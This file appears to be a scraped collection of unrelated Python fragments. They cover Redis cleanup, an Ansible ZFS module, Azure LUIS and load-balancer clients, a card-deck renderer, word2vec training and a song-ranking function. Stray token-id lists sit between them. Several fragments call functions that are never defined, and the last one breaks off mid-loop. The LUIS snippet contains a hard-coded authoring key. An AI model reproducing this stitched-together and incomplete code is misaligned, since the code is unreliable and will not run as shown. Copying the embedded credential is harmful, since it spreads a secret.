        # Check mes_device_status_* keys: delete any key that no longer has a
        # corresponding entry in the preload table.
        keys_need_del = list(set(dbRedis.keys("mes_device_status_*")).difference(all_device.keys()))
        if keys_need_del: dbRedis.delete(*keys_need_del)
        err_msg = "ok"
    except Exception as e:
        err_msg = appPaaS.catch_exception(e, sys.exc_info(), SYSTEM)
    finally:
        if not selfUse:
            # NOTE(review): returning from `finally` suppresses any in-flight
            # exception; confirm intentional.
            dicRet["Response"] = err_msg
            return jsonify( **dicRet)
#}}} | [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
36261,
19937,
12489,
198,
37811,
198,
23926,
25609,
855,
198,
25598,
220,
220,
220,
1058,
7643,
14,
1238,
14,
5539,
198,
5956,
4296,
25,
7816,
14,
2919,
14,
1238,
2... | 2.120585 | 6,286 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Nate Coraor <nate@coraor.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: zfs_delegate_admin
short_description: Manage ZFS delegated administration (user admin privileges)
description:
- Manages ZFS file system delegated administration permissions, which allow unprivileged users to perform ZFS
operations normally restricted to the superuser.
- See the C(zfs allow) section of C(zfs(1M)) for detailed explanations of options.
- This module attempts to adhere to the behavior of the command line tool as much as possible.
requirements:
- "A ZFS/OpenZFS implementation that supports delegation with `zfs allow`, including: Solaris >= 10, illumos (all
versions), FreeBSD >= 8.0R, ZFS on Linux >= 0.7.0."
options:
name:
description:
- File system or volume name e.g. C(rpool/myfs).
required: true
type: str
state:
description:
- Whether to allow (C(present)), or unallow (C(absent)) a permission.
- When set to C(present), at least one "entity" param of I(users), I(groups), or I(everyone) are required.
- When set to C(absent), removes permissions from the specified entities, or removes all permissions if no entity params are specified.
required: true
choices: [ absent, present ]
default: present
users:
description:
- List of users to whom permission(s) should be granted.
type: list
groups:
description:
- List of groups to whom permission(s) should be granted.
type: list
everyone:
description:
- Apply permissions to everyone.
type: bool
default: no
permissions:
description:
- The list of permission(s) to delegate (required if C(state) is C(present)).
type: list
choices: [ allow, clone, create, destroy, diff, hold, mount, promote, readonly, receive, release, rename, rollback, send, share, snapshot, unallow ]
local:
description:
- Apply permissions to C(name) locally (C(zfs allow -l)).
type: bool
descendents:
description:
- Apply permissions to C(name)'s descendents (C(zfs allow -d)).
type: bool
recursive:
description:
- Unallow permissions recursively (ignored when C(state) is C(present)).
type: bool
default: no
author:
- Nate Coraor (@natefoo)
'''
EXAMPLES = r'''
- name: Grant `zfs allow` and `unallow` permission to the `adm` user with the default local+descendents scope
community.general.zfs_delegate_admin:
name: rpool/myfs
users: adm
permissions: allow,unallow
- name: Grant `zfs send` to everyone, plus the group `backup`
community.general.zfs_delegate_admin:
name: rpool/myvol
groups: backup
everyone: yes
permissions: send
- name: Grant `zfs send,receive` to users `foo` and `bar` with local scope only
community.general.zfs_delegate_admin:
name: rpool/myfs
users: foo,bar
permissions: send,receive
local: yes
- name: Revoke all permissions from everyone (permissions specifically assigned to users and groups remain)
community.general.zfs_delegate_admin:
name: rpool/myfs
everyone: yes
state: absent
'''
# This module does not return anything other than the standard
# changed/state/msg/stdout
RETURN = '''
'''
from itertools import product
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
    # Standard Ansible module entry point. NOTE(review): main() is not
    # defined in this chunk — it presumably follows elsewhere in the
    # original file; confirm before running.
    main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
15069,
25,
357,
66,
8,
1853,
11,
23486,
2744,
64,
273,
1279,
77,
378,
31,
66,
5799,
273,
13,
2398,
29,
198,
2,
... | 2.99245 | 1,192 |
# Funções
def equacao_reta(x):
    """Evaluate the line equation y(x) = 2*x + 1 and return the result.

    Bug fix: the definition previously lived only inside a disabled
    triple-quoted block (along with an interactive input() variant), so the
    loops below raised NameError when calling it. The function is now a real
    top-level definition.
    """
    return 2 * x + 1


# Sample the line at each x, collecting the corresponding y values.
lista_x = [1, 2, 3, 4, 5, 6]
lista_y = []
for valor_x in lista_x:
    lista_y.append(equacao_reta(valor_x))

# Print each (x, y) pair side by side.
for valor_x, valor_y in zip(lista_x, lista_y):
    print("O valor de y(%0.1f) = %0.1f" % (valor_x, valor_y))
2,
24629,
16175,
127,
113,
274,
198,
39115,
198,
10052,
2559,
18604,
198,
198,
4299,
1602,
330,
5488,
62,
1186,
64,
7,
87,
2599,
198,
220,
220,
220,
331,
62,
87,
796,
362,
1635,
2124,
1343,
352,
198,
220,
220,
220,
1441,
331,
62,
... | 2.170732 | 246 |
from typing import Tuple, cast
from ..base import BaseFile
from .part import BlockingParts
from ...models.file import (
FileModel,
UploadUrlModel,
FileDeleteModel,
PartCancelModel
)
from ...settings import DownloadSettings, CopyFileSettings
from ...exceptions import AwaitingOnly
from ...utils import UploadUrlCache
from ...decorators import authorize_required
| [
6738,
19720,
1330,
309,
29291,
11,
3350,
198,
198,
6738,
11485,
8692,
1330,
7308,
8979,
198,
198,
6738,
764,
3911,
1330,
1086,
8629,
42670,
198,
198,
6738,
2644,
27530,
13,
7753,
1330,
357,
198,
220,
220,
220,
9220,
17633,
11,
198,
22... | 3.5 | 110 |
from tests.cli import make_client, run_cmd
from tests.util import answers
| [
6738,
5254,
13,
44506,
1330,
787,
62,
16366,
11,
1057,
62,
28758,
198,
6738,
5254,
13,
22602,
1330,
7429,
628,
628,
628
] | 3.590909 | 22 |
# Imports
import numpy as np
import os
import json
import sys
# noinspection PyPep8Naming
from scipy.spatial.transform import Rotation
# This class converts AMASS SMPLH .npz body animation files into Unity-readable .json files.
# See AMASSConverterExamples file for an example on how to use this class.
if __name__ == "__main__":
main() | [
2,
1846,
3742,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
198,
11748,
33918,
198,
11748,
25064,
198,
2,
645,
1040,
14978,
9485,
47,
538,
23,
45,
3723,
198,
6738,
629,
541,
88,
13,
2777,
34961,
13,
35636,
1330,
371,
14221,
... | 3.254717 | 106 |
from InterpreteF2.NodoAST import NodoArbol
from InterpreteF2.Tabla_de_simbolos import Tabla_de_simbolos
from InterpreteF2.Arbol import Arbol
from InterpreteF2.Valor.Valor import Valor
from InterpreteF2.Primitivos.TIPO import TIPO
from InterpreteF2.Primitivos.COMPROBADOR_deTipos import COMPROBADOR_deTipos
from InterpreteF2.Reporteria.ReporteOptimizacion import ReporteOptimizacion
# Optimization rules
# Rule 4
# Rule 5
6738,
4225,
3866,
660,
37,
17,
13,
45,
24313,
11262,
1330,
399,
24313,
3163,
28984,
198,
6738,
4225,
3866,
660,
37,
17,
13,
33349,
5031,
62,
2934,
62,
82,
14107,
349,
418,
1330,
16904,
5031,
62,
2934,
62,
82,
14107,
349,
418,
198,
... | 2.52 | 175 |
# coding: utf-8
import sys
import os
# Make the project root (parent of this script's directory) importable ahead
# of most other entries so the local `strtodate` package is found first.
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from strtodate import strtodate
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
25064,
198,
11748,
28686,
198,
17597,
13,
6978,
13,
28463,
7,
16,
11,
28686,
13,
6978,
13,
22179,
7,
17597,
13,
6978,
58,
15,
4357,
705,
492,
6,
4008,
198,
6738,
965,
83,
375,
378,
133... | 2.44 | 50 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class LbOperations(object):
    """LbOperations operations.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # NOTE(review): the generated __init__ (binding self._client,
    # self.config, self._serialize, self._deserialize) is not present in
    # this chunk — it appears to have been stripped; restore from the
    # AutoRest generator output.

    def create_or_update(
            self, resource_group_name, deployment_name, load_balancer_name, content_version=None, backend_pool_name=None, dns_name_type="none", frontend_ip_name="LoadBalancerFrontEnd", location=None, private_ip_address=None, private_ip_address_allocation="dynamic", public_ip_address=None, public_ip_address_allocation="dynamic", public_ip_address_type="new", public_ip_dns_name=None, subnet=None, subnet_address_prefix="10.0.0.0/24", subnet_type="none", tags=None, virtual_network_name=None, vnet_address_prefix="10.0.0.0/16", custom_headers=None, raw=False, **operation_config):
        """
        Create or update a virtual machine.

        :param resource_group_name: The name of the resource group. The name
         is case insensitive.
        :type resource_group_name: str
        :param deployment_name: The name of the deployment.
        :type deployment_name: str
        :param load_balancer_name: Name for load balancer.
        :type load_balancer_name: str
        :param content_version: If included it must match the ContentVersion
         in the template.
        :type content_version: str
        :param backend_pool_name: Name of load balancer backend pool.
        :type backend_pool_name: str
        :param dns_name_type: Associate VMs with a public IP address to a DNS
         name. Possible values include: 'none', 'new'
        :type dns_name_type: str or :class:`dnsNameType
         <lbcreationclient.models.dnsNameType>`
        :param frontend_ip_name: Name of the frontend IP configuration.
        :type frontend_ip_name: str
        :param location: Location for load balancer resource.
        :type location: str
        :param private_ip_address: Static private IP address to use.
        :type private_ip_address: str
        :param private_ip_address_allocation: Private IP address allocation
         method. Possible values include: 'dynamic', 'static'
        :type private_ip_address_allocation: str or
         :class:`privateIpAddressAllocation
         <lbcreationclient.models.privateIpAddressAllocation>`
        :param public_ip_address: Name or ID of the public IP address to use.
        :type public_ip_address: str
        :param public_ip_address_allocation: Public IP address allocation
         method. Possible values include: 'dynamic', 'static'
        :type public_ip_address_allocation: str or
         :class:`publicIpAddressAllocation
         <lbcreationclient.models.publicIpAddressAllocation>`
        :param public_ip_address_type: Type of Public IP Address to associate
         with the load balancer. Possible values include: 'none', 'new',
         'existingName', 'existingId'
        :type public_ip_address_type: str or :class:`publicIpAddressType
         <lbcreationclient.models.publicIpAddressType>`
        :param public_ip_dns_name: Globally unique DNS Name for the Public IP
         used to access the Virtual Machine (new public IP only).
        :type public_ip_dns_name: str
        :param subnet: The subnet name or ID to associate with the load
         balancer. Cannot be used in conjunction with a Public IP.
        :type subnet: str
        :param subnet_address_prefix: The subnet address prefix in CIDR
         format (new subnet only).
        :type subnet_address_prefix: str
        :param subnet_type: Use new, existing or no subnet. Possible values
         include: 'none', 'new', 'existingName', 'existingId'
        :type subnet_type: str or :class:`subnetType
         <lbcreationclient.models.subnetType>`
        :param tags: Tags object.
        :type tags: object
        :param virtual_network_name: The VNet name containing the subnet.
         Cannot be used in conjunction with a Public IP.
        :type virtual_network_name: str
        :param vnet_address_prefix: The virtual network IP address prefix in
         CIDR format (new subnet only).
        :type vnet_address_prefix: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns :class:`DeploymentExtended
         <default.models.DeploymentExtended>`
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        """
        # Bundle every flattened argument into the generated deployment model.
        parameters = models.DeploymentLb(content_version=content_version, backend_pool_name=backend_pool_name, dns_name_type=dns_name_type, frontend_ip_name=frontend_ip_name, load_balancer_name=load_balancer_name, location=location, private_ip_address=private_ip_address, private_ip_address_allocation=private_ip_address_allocation, public_ip_address=public_ip_address, public_ip_address_allocation=public_ip_address_allocation, public_ip_address_type=public_ip_address_type, public_ip_dns_name=public_ip_dns_name, subnet=subnet, subnet_address_prefix=subnet_address_prefix, subnet_type=subnet_type, tags=tags, virtual_network_name=virtual_network_name, vnet_address_prefix=vnet_address_prefix)

        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
            'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'DeploymentLb')

        # Construct and send request
        # NOTE(review): the generated nested helpers `long_running_send`,
        # `get_long_running_output` and `get_long_running_status` are
        # referenced below but are not defined in this chunk — they appear
        # to have been stripped; restore them from the generator output.
        if raw:
            response = long_running_send()
            return get_long_running_output(response)

        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
| [
2,
16529,
1783,
10541,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
4091,
13789,
13,
14116,
287,
262,
1628,
6808,
329,
5964,
1321,
13,
198,
2,
16529,
1783,
10541,
198,... | 2.776325 | 2,982 |
if __name__ == '__main__':
    # NOTE(review): `math()` is called but never defined here, and the stdlib
    # `math` module is not callable — as written this raises NameError (or
    # TypeError if `math` was imported). Confirm the intended entry point.
    math()
| [
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
10688,
3419,
198
] | 2.105263 | 19 |
#! /usr/bin/env python3
import csv
import json
import os
import pathlib
import sys
import numpy as np
import cairo
import argparse
import layout
from draw_card import drawCard
from card_model import CardModel
from card_model import CardDeck
def extant_file(x):
    """Argparse ``type`` callable: validate that *x* names an existing path.

    Returns *x* unchanged when the path exists; otherwise raises
    ``argparse.ArgumentTypeError`` (which argparse turns into a rejection
    message such as ``error: argument input: x does not exist``) without
    opening the file.
    """
    if os.path.exists(x):
        return x
    raise argparse.ArgumentTypeError("{0} does not exist".format(x))
##### CLI args #####
# NOTE(review): indentation of this script was reconstructed from a
# whitespace-mangled source; loop boundaries below (especially whether the
# image-processing sections sit inside the per-page loop) should be
# confirmed against the original file.
parser = argparse.ArgumentParser(description="Deck Generator for Game Designers")
parser.add_argument('-d', '--deck', type=extant_file, help='csv file containing the deck', metavar="FILE", required=True)
parser.add_argument('-c', '--cards', type=extant_file, help='json file containing cards description', metavar="FILE", required=True)
parser.add_argument('-i', '--images', help='Add images to cards', action='store_true')
parser.add_argument('-r', '--rgb', help='Update layout card border colour with given R,G,B, only works with default layout', nargs=3, type=int)
parser.add_argument('-l', '--layout', help='Use a different layout than default', type=extant_file, metavar="FILE")
args = parser.parse_args()

handle_images = args.images
modify_layout = args.rgb
deck_file = args.deck
cards_file = args.cards
#deck_file = './example_deck.csv'
# Deck name = csv filename without its 4-character ".csv" extension.
deck_name = os.path.basename(deck_file)[:-4]

# Read the deck csv: keep a verbatim copy (header + rows) for re-export, and
# expand each row into `count` copies of the card name (row[0] = count,
# row[1] = name).
nameList = []
list_copy = []
with open(deck_file, encoding='utf-8') as csvFile:
    reader = csv.reader(csvFile)
    list_copy.append(reader.__next__())
    for row in reader:
        list_copy.append(row)
        nameList = nameList + [row[1]] * int(row[0])

# Build card models and split them into pages of 9 (3x3 grid).
cards = CardDeck(cards_file)
cardList = [CardModel(name,cards.getDb()) for name in nameList]
pageList = [cardList[i:i+9] for i in range(0, len(cardList), 9)]

# Ensure the output directory decks/<deck_name>/ exists.
if not os.path.exists('decks'):
    os.mkdir('decks')
if not os.path.exists(os.path.join('decks',deck_name)):
    os.mkdir(os.path.join('decks',deck_name))

# Render each page of up to 9 cards onto one cairo surface and save as PNG.
for page_number in range(len(pageList)):
    print(f'Page {page_number}:')
    page = pageList[page_number]
    surf = layout.getSurface()
    ctx = cairo.Context(surf)
    for i in range(len(page)):
        card = page[i]
        # Grid position: column = i % 3, row = i // 3.
        cardPos = (i % 3, i // 3)
        print(cardPos)
        print(card)
        mat = layout.getMatrix(*cardPos, surf)
        ctx.set_matrix(mat)
        drawCard(card, ctx)
    surf.write_to_png(f'decks/{deck_name}/{deck_name}_p{page_number}.png')

    # Image post-processing helpers (imported here in the original source).
    from add_images import BaseImage
    from add_images import addImage
    from add_images import processImage
    from PIL import Image

    if (modify_layout is not None):
        # Recolour the card borders: every grey pixel in the 190..252 range is
        # replaced by the user-supplied R,G,B (alpha channel left untouched).
        baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
        temp = baseImage.baseImage.convert('RGBA')
        data = np.array(temp)
        red, green, blue, alpha = data.T
        for i in range(0,63):
            white_areas = (red == 190+i) & (blue == 190+i) & (green == 190+i)
            data[..., :-1][white_areas.T] = (modify_layout[0], modify_layout[1], modify_layout[2])
        baseImage.update(Image.fromarray(data))
        baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')

    #import pdb;pdb.set_trace()
    if (handle_images):
        if not os.path.exists(os.path.join('decks',deck_name,'images')):
            os.mkdir(os.path.join('decks',deck_name,'images'))
        #open the previous png to add the images
        baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
        for i in range (len(page)):
            card = page[i]
            cardPos = (i % 3, i // 3)
            processImage(card,deck_name)
            baseImage.update(addImage(card,baseImage,deck_name, cardPos))
        baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')

# Write the verbatim csv copy alongside the rendered pages.
with open(f'decks/{deck_name}/{deck_name}.csv', 'w') as deck_copy:
    filewriter = csv.writer(deck_copy)
    for element in list_copy:
        filewriter.writerow(element)
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
11748,
269,
21370,
198,
11748,
33918,
198,
11748,
28686,
198,
11748,
3108,
8019,
198,
11748,
25064,
198,
11748,
299,
32152,
355,
45941,
198,
198,
11748,
1275,
7058,
198,
11748,
182... | 2.44811 | 1,667 |
import unittest
from shmakovpn.extend_builtins import ExtendedDict
from functools import reduce
from typing import List, Dict, Any
class TestGroupByExtendedDict(unittest.TestCase):
    """
    This class contains tests of **groupby** using **ExtendedDict**
    """
    data: List[Dict[str, Any]] = [
        {'name': 'alex', 'score': 2, },
        {'name': 'john', 'score': 4, },
        {'name': 'dan', 'score': 1, },
        {'name': 'alex', 'score': 6, },
        {'name': 'dan', 'score': 3, },
    ]
    """the dataset for tests"""

    def test_group_by_extended_dict(self):
        """
        Test for **groupby** that uses **ExtendedDict**

        Folds the dataset with reduce(): each step appends the record's score
        to the accumulator entry keyed by the record's name (pop + re-add via
        return_updated), yielding name -> list-of-scores.
        """
        self.assertEqual(
            reduce(
                lambda a, b: a.return_updated(
                    **{b['name']: a.pop(b['name'], []) + [b['score']]}
                ),
                self.data,
                ExtendedDict(),  # use **ExtendedDict** as an accumulator
            ), {
                'john': [4],
                'alex': [2, 6],
                'dan': [1, 3],
            }
        )
| [
11748,
555,
715,
395,
201,
198,
6738,
427,
76,
44715,
21999,
13,
2302,
437,
62,
18780,
1040,
1330,
24204,
35,
713,
201,
198,
6738,
1257,
310,
10141,
1330,
4646,
201,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
11,
4377,
201,
198,
20... | 1.861436 | 599 |
{
'variables': {
'project_name': 'examples',
'current_dir': '<(DEPTH)',
},
'targets': [
{
'target_name': 'basic_sample',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_sample.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'basic_render',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_render.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'simple_texture',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'simple_texture.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
],
}
| [
90,
198,
220,
705,
25641,
2977,
10354,
1391,
198,
220,
220,
220,
705,
16302,
62,
3672,
10354,
705,
1069,
12629,
3256,
198,
220,
220,
220,
705,
14421,
62,
15908,
10354,
705,
27,
7,
46162,
4221,
8,
3256,
198,
220,
8964,
198,
220,
705,... | 1.815686 | 510 |
from azure.cognitiveservices.language.luis.authoring import LUISAuthoringClient
from msrest.authentication import CognitiveServicesCredentials

import datetime, json, os, time

# SECURITY NOTE(review): a LUIS authoring key is hard-coded in source control.
# Rotate this credential and load it from an environment variable or a secret
# store instead of committing it.
authoring_key = "bde233f61f5e4e3fa48ff5a11b0f304c"
region = "westus"
# Regional LUIS authoring endpoint derived from the region above.
endpoint = "https://{}.api.cognitive.microsoft.com".format(region)

# Instantiate the LUIS authoring client with key-based credentials.
client = LUISAuthoringClient(endpoint, CognitiveServicesCredentials(authoring_key))
| [
198,
6738,
35560,
495,
13,
66,
2360,
20288,
712,
1063,
13,
16129,
13,
2290,
271,
13,
9800,
278,
1330,
50168,
1797,
13838,
278,
11792,
198,
6738,
13845,
2118,
13,
41299,
3299,
1330,
38655,
31007,
34,
445,
14817,
198,
198,
11748,
4818,
... | 2.972789 | 147 |
# Copyright 2020 Silicon Compiler Authors. All Rights Reserved.
import siliconcompiler
import pytest
@pytest.fixture
##################################
def test_minimum(chip):
'''API test for min/max() methods
'''
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow , 'syn'))
chip.write_flowgraph('minmax.png')
chip.write_manifest('minmax.json')
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
assert winner[0] + winner[1] == 'syn9'
| [
2,
15069,
12131,
18210,
3082,
5329,
46665,
13,
1439,
6923,
33876,
13,
198,
11748,
29867,
5589,
5329,
198,
11748,
12972,
9288,
198,
198,
31,
9078,
9288,
13,
69,
9602,
198,
198,
29113,
2235,
198,
4299,
1332,
62,
39504,
7,
35902,
2599,
1... | 2.703349 | 209 |
import torch.utils.data as ut
import torch
import cPickle as cp
import numpy as np
from utils import Progbar, getdata
from model import Word2vec
from torch.autograd import Variable
import torch.optim as optim
from constants import *
use_cuda = torch.cuda.is_available()
data = filter(lambda x: len(x) > 1, open(TEXT).read().split(' '))
word2ix = cp.load(open(VOCAB_FILE))
unigram_table = np.load(UNIGRAM_TABLE_FILE)
data = filter(lambda x: x in word2ix, data)
syn_set = {}
ant_set = {}
with open(PPDB_SYN_FILE) as f:
for line in f:
line = line.strip().split(' ')
syn_set = add2dict(line[0], line[1], syn_set, word2ix)
with open(PPDB_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
with open(WORDNET_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
# Convert the sets to lists
syn_set = {w: list(syn_set[w]) for w in syn_set}
ant_set = {w: list(ant_set[w]) for w in ant_set}
def generate_data(data, word2ix, window_size):
"""
Takes in a sequence of words, and returns the indexed data, a list of (word, [2 * window])
:param data: sequence of words
:param word2ix: dictionary mapping words to indexes
:param window_size: Lenght of window
:return indexed_data: List of (word_ix, [2 * window])
"""
indexed_data = []
for ix in xrange(window_size, len(data) - window_size):
word_ix = word2ix[data[ix]]
window = [word2ix[w] for w in data[ix - window_size: ix]] + [word2ix[w] for w in data[ix + 1: ix + window_size + 1]]
indexed_data.append((word_ix, window))
return indexed_data
window = 4
neg_samples = 25
n_syn = 4
n_ant = 4
indexed_data = generate_data(data, word2ix, window)
iterator = DataIterator(unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant)
BATCH_SIZE = 128
dataloader = ut.DataLoader(iterator, batch_size=BATCH_SIZE,
shuffle=True, num_workers=0)
N_EPOCHS = 5
# lr = 0.001
lr = 0.025
bar = Progbar(N_EPOCHS)
w2v = Word2vec(len(word2ix), 300, sparse=False)
optimizer = optim.Adagrad(w2v.parameters(), lr=lr)
words_processed = 0.
for epoch in xrange(N_EPOCHS):
n_batches = len(iterator) // BATCH_SIZE if len(iterator) % BATCH_SIZE == 0 else (len(iterator) // BATCH_SIZE) + 1
bar = Progbar(n_batches)
print "\nEpoch (%d/ %d)\n" % (epoch + 1, N_EPOCHS)
for ix, batch in enumerate(dataloader):
batch = map(lambda x: Variable(x), batch)
if use_cuda:
batch = map(lambda x: x.cuda(), batch)
loss, p_score, n_score, s_score, a_score = w2v(*batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Update the lr
words_processed += BATCH_SIZE
new_lr = lr * max(1e-4, 1. - (words_processed / (len(iterator) * N_EPOCHS)))
for param_groups in optimizer.param_groups:
param_groups['lr'] = new_lr
loss, p_score, n_score, s_score, a_score = map(lambda x: getdata(x).numpy()[0], [loss, p_score, n_score, s_score, a_score])
bar.update(ix + 1, values=[('l', loss), ('p', p_score), ('n', n_score), ('s', s_score), ('a', a_score), ('lr', new_lr)])
weights = w2v.embedding_i.weight
weights = weights.cpu() if use_cuda else weights
weights = weights.data.numpy()
save_file = BASE_DIR + "Models/vocab_matrix_with_syn_ant.npy"
np.save(save_file, weights)
| [
11748,
28034,
13,
26791,
13,
7890,
355,
3384,
198,
11748,
28034,
198,
11748,
269,
31686,
293,
355,
31396,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
3384,
4487,
1330,
1041,
70,
5657,
11,
651,
7890,
198,
6738,
2746,
1330,
9678,
17,
... | 2.305828 | 1,527 |
import LevelBuilder
from sprites import * | [
11748,
5684,
32875,
198,
6738,
42866,
1330,
1635
] | 5.125 | 8 |
from typing import Dict, List
import pickle
import numpy as np
def predict_song(neighbors: Dict[str, List[int]]) -> Dict[str, List[int]]:
"""predict the ranks of song ids for each hum given its retrieved song neighbors
The most importance job is choose the first place song
The rules are, given one hum query and its retrieved neighbors:
1. if in top 10, there is no song id that appear 2 times then the rank
follow the distance rank
2. if in top 10, there is a song that appear >= 3 times, it must be ranked first place
3. if in top 10, there are song ids that appear 2 times and their ranks < 5, it will be ranked first
4. if in top 10, there are more than one song id that appear >= 2 times,
choose the one that has rank sum smaller to be top 1, then the second rank is the next
the other positions will follow the distance rank given that it is not already in the ranked list.
"""
# first we only choose the first rank song
# assume song_ids are all ints
ranked_ = {}
for qname, nbs in neighbors.items():
chosen = []
# if one song appear more than 3 times in top 5, it must be the one
# if the nearest song is not ranked first by this rule, it must be ranked second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if max_count >=3:
idx = list(counts).index(max_count)
chosen.append(ids[idx])
if nbs[0] != chosen[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
# if in top 5 there are *2* song_ids that both appear 2 times, then the one
# that on top 1 and appear 2 times will be the first, the one on top 2
# or larger and appear 2 times will be the second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if len(ids) == 3 and max_count == 2:
nearest_song = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song)
count_of_nearest_song = counts[idx_of_nearest_song]
if count_of_nearest_song == 2:
chosen.append(nearest_song)
for i, c in enumerate(counts):
if c == 2 and ids[i] not in chosen:
chosen.append(ids[i])
ranked_[qname] = chosen
continue
# if in top 5, there is *one* song_id that appear 2 times and one of that is
# top 1, then it must be the one
# if that song_id appear 2 times but not the nearest, then it still ranked
# top 1 but the second ranked is the nearest
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 4:
nearest_song_id = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song_id)
if counts[idx_of_nearest_song] == 2:
chosen.append(nearest_song_id)
ranked_[qname] = chosen
continue
elif counts[idx_of_nearest_song] == 1:
idx = list(counts).index(2)
song_id = ids[idx]
chosen.append(song_id)
chosen.append(nearest_song_id)
# if top 10 are 10 different songs, the just take those
ids, counts = np.unique(nbs[:10], return_counts = True)
if len(ids) == 10:
chosen = nbs[:10]
ranked_[qname] = list(chosen)
continue
# if in top 5, there are 5 different song ids, and there is one or more
# song_ids that also appear on top 10 and on top 5, then it will be the
# first rank, the second rank is the one that nearest(if the previous is
# not the nearest)
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 5: # also means max_count == 1
new_ids, new_counts = np.unique(nbs[5:10], return_counts = True)
for id in nbs[:5]:
if int(id) in new_ids:
chosen.append(id)
if len(chosen) == 0:
chosen = list(nbs[:10])
ranked_[qname] = chosen
continue
if chosen[0] != nbs[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
if len(chosen) == 0:
ranked_[qname] = list(nbs[:10])
# now add the remaining neighbors to the rank list, follow the distance rank
for qname, ranks in ranked_.items():
if len(ranks) == 0:
print('ranks=0')
j = 0
while len(ranks) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in ranks:
ranks.append(neighbors[qname][j])
j+=1
while len(ranks) < 10:
ranks.append(0)
absences = set(neighbors.keys()) - set(ranked_.keys())
for qname in absences:
chosen = []
j = 0
while len(chosen) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in chosen:
